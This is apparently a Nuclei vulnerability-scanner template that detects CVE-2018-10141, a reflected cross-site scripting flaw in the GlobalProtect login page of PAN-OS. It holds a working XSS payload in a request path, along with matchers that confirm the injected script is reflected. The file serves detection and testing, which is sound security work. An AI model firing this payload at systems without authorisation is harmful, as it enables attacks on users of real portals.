nuclei-templates/cves/2018/CVE-2018-10141.yaml

38 lines
977 B
YAML

id: CVE-2018-10141
info:
name: GlobalProtect Login page XSS
author: dhiyaneshDk
severity: medium
description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-10141
- https://security.paloaltonetworks.com/CVE-2018-10141
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-10141
cwe-id: CWE-79
tags: cve,cve2018,panos,vpn,globalprotect,xss
requests:
- method: GET
path:
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var valueUser = "j";-alert(1)-"x";'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200